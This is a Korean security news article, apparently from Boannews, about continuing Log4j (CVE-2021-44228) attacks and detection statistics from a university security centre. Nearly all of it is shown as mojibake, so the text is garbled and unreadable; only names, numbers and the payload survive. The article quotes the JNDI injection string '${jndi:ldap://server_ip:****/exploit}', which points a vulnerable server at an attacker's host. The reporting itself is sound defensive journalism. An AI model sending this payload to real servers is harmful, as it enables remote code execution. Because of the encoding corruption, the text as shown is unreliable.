°ø°ÝÇüÅ ´Ù¾çÇÏ°í, º¸¾ÈÀåºñ ¿ìȸ °¡´É¼º ÀÖ¾î À§Çèµµ ³ô¾Æ
[º¸¾È´º½º ±âȹÃëÀçÆÀ] Áö³ÇØ ¹ß°ßµÅ ¿ª´ë ÃÖ¾ÇÀÇ Ãë¾àÁ¡À¸·Î ºÒ¸®´Â Log4j Ãë¾àÁ¡, ÀÏ¸í ·Î±×4¼ÐÀ» ¾Ç¿ëÇÑ »çÀ̹ö°ø°ÝÀÌ Áö¼ÓÀûÀ¸·Î Æ÷ÂøµÅ ÀÌ¿ëÀÚµéÀÇ °¢º°ÇÑ ÁÖÀÇ°¡ ÇÊ¿äÇÏ´Ù. Log4j´Â JAVA¸¦ ±â¹ÝÀ¸·Î ¼¹ö¿Í ÀÀ¿ëÇÁ·Î±×·¥¿¡¼ ¹ß»ýÇÏ´Â ·Î±×¸¦ ³²±â±â À§ÇØ »ç¿ëÇÏ´Â À¯Æ¿¸®Æ¼ÀÌ´Ù. ÇØ´ç Ãë¾àÁ¡Àº apache Log4j ¼ÒÇÁÆ®¿þ¾îÀÇ 2.14.1 ÀÌÀü¹öÀü¿¡ Á¸ÀçÇϸç, ½Äº° ¹øÈ£´Â CVE-2021-44228ÀÌ´Ù.
¡ã2021³â 12¿ù~2022³â 4¿ù ·Î±×4j Ãë¾àÁ¡ °ø°Ý °Ç¼ö Åë°è[ÀÚ·á=¿µ³²ÀÌ°ø´ë »çÀ̹öº¸¾È¿¬±¸¼¾ÅÍ]
¿µ³²ÀÌ°ø´ëÇб³ »çÀ̹öº¸¾È¿¬±¸¼¾ÅÍ(¼¾ÅÍÀå ÀÌÁ¾¶ô)¿¡¼ ÀÚü ¿î¿µÁßÀÎ º¸¾È°üÁ¦¼¾Å͸¦ ÅëÇØ ÃÖ±Ù±îÁö ¼öÁýÇÑ µ¥ÀÌÅ͸¦ »ìÆ캸¸é, Ãë¾àÁ¡ÀÌ ¹ß»ýÇÑ Áö³ÇØ 12¿ùÀ» ±âÁ¡À¸·Î log4j Ãë¾àÁ¡ °ø°ÝÀÌ Áö¼ÓÀûÀ¸·Î ŽÁöµÇ´Ù°¡ 12¿ù 25ÀÏ °ø°Ý Ƚ¼ö°¡ 250ȸ±îÁö Ä¡¼Ú¾Ò´Ù. ÀÌÈÄ °ø°ÝȽ¼ö´Â Á¡Â÷ ÁÙ¾úÀ¸³ª, ¿ÃÇØ 2¿ù 8ÀÏ 200¿©°ÇÀ¸·Î ´Ù½Ã ±ÞÁõÇß´Ù. ¶ÇÇÑ, 3¿ù 4ÀÏ ÀÌÈÄ 150°ÇÀ¸·Î ±Þ°ÝÈ÷ ´Ã¾ú´Ù.
°ø°Ý¿¡ ÁÖ·Î »ç¿ëµÇ´Â ÄÚµå´Â ¡®${jndi:ldap://server_ip:****/exploit}¡¯À̸ç, °ø°ÝÄڵ尡 ÃÖÃÊ ¹ßÇ¥µÆ´ø ÇüÅ¿¡¼ º¸¾ÈÀåºñ ¿ìȸ¸¦ À§ÇØ ´Ù¾çÇÏ°Ô º¯ÈµÈ °ÍÀ¸·Î È®ÀεƴÙ.
log4j Ãë¾àÁ¡Àº °ø°Ý¿¡ ¼º°øÇÒ °æ¿ì ÇÇÇØ ¼¹ö¿¡¼ °ø°ÝÀÚ°¡ ÀǵµÇÏ´Â ¸í·É¾î°¡ Á÷Á¢ÀûÀ¸·Î ½ÇÇàµÉ ¼ö ÀÖ¾î ¸Å¿ì À§ÇèÇÏ´Ù. ÀÌ´Â Ãë¾àÁ¡ À§Çèµµ Æò°¡ÀÎ CVSS score¿¡¼ ÃÖ°íÁ¡ÀÎ 10Á¡ÀÌ ºÎ¿©µÈ »ç½Ç·Îµµ ¾Ë ¼ö ÀÖ´Ù.
¿µ³²ÀÌ°ø´ëÇб³ »çÀ̹öº¸¾È¿¬±¸¼¾ÅÍ À¯Çö¼ ¿¬±¸¿øÀº ¡°°ø°ÝÀÇ ÇüÅ°¡ ¸Å¿ì ´Ù¾çÇϱ⠶§¹®¿¡ ŽÁö ·êÀÇ ±¸¼º¿¡ µû¶ó º¸¾ÈÀåºñ¿¡¼ ¿ìȸ °¡´É¼ºÀÌ Á¸ÀçÇÑ´Ù¡±¸ç ¡°°ø°Ý Äڵ尡 º¸¾È Àåºñ¿¡¼ Á¦´ë·Î ŽÁöµÇ°í ÀÖ´ÂÁö Á¡°ËÇØ¾ß ÇÑ´Ù¡±°í ¹àÇû´Ù.
[º¸¾È´º½º ±âȹÃëÀçÆÀ(boan3@boannews.com)]
<ÀúÀÛ±ÇÀÚ: º¸¾È´º½º(www.boannews.com) ¹«´ÜÀüÀç-Àç¹èÆ÷±ÝÁö>